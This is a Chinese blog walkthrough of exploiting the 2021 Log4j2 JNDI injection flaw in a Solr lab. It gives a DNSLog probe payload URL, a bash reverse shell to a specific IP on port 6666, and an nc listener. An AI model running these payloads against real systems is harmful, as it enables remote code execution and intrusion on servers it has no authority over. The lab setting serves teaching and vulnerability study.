当前位置: 首页 > news >正文

log4j2漏洞

log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末 log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。 apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失

我们用云服务器执行命令,启动容器,开启靶场环境

 显示done就是启动成功

进入靶场

 

输入命令,利用dnslog来测试靶场,监视注入结果

 

 

在/solr/admin/cores?有个参数可以传,这就是个注入点,我们试试能不能输出java版本,构造payload,访问的url如下:

http://116.62.119.171:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.(dns获取的域名) }

如果存在log4j2漏洞,我们将在DNSLog平台看到回显,返回刚才的DNSLog平台,点击刷新记录Refresh Record

我们先编写恶意文件,将shell反弹到云服务器的6666端口上

因此对应的bash命令为

bash -i >& /dev/tcp/116.62.119.171/6666 0>&1

然后对上述命令进行base64编码

有了编码结果,我们就可以编写恶意文件 

 

 将得到的恶意文件拿到之前的网站进行注入

重新打开一个终端,开启nc监听6666端口

 反弹到shell,我们可以输入windows命令测试

原先的终端窗口也有消息

相关文章:

  • 案例驱动的 IT 团队管理:创新与突破之路:第一章 重构 IT 团队管理:从传统到创新-1.1.1技术迭代加速与人才断层
  • 量子计算 × 虚拟现实:未来科技的双剑合璧
  • 电子电气架构 --- 汽车面对软件怎么“破局“?
  • Linux驱动开发进阶 - 文件系统
  • TS常见内置映射类型的实现及应用场景
  • Emacs 折腾日记(十七)——文本属性
  • Spark Sql 简单校验的实现
  • 大模型-提示词调优
  • 使用VSCode开发STM32补充(Debug调试)
  • Django连接MySQL
  • 徒手打造个人AI Agent:基于DeepSeek-R1+websearch从零构建类Manus深度探索智能体AI-Research
  • python爬虫Scrapy(5)之增量式
  • 使用Java调用Windows通知并显示自定义图标
  • 使用memmove优化插入排序
  • 【专项测试】限流测试
  • maven的安装配置
  • 【数据结构】线性表简介
  • 重要!!! 什么是梯度方差 ; AdaLoRA中的Fisher信息矩阵:核心作用与通俗举例
  • RUOYI框架在实际项目中的应用二:Ruoyi前后端分离版本
  • 【MySQL】(5) 数据行的增删改查操作
  • 东莞多地调整为中高风险地区/安卓aso关键词优化
  • web网站性能测试怎么做/网络营销公司招聘
  • 动态网站建设流程/引流获客工具
  • 建设网站的技术风险/网页模板
  • 做外贸什么网站比较好/泾县网站seo优化排名
  • 东莞个人网站推广建设/1元购买域名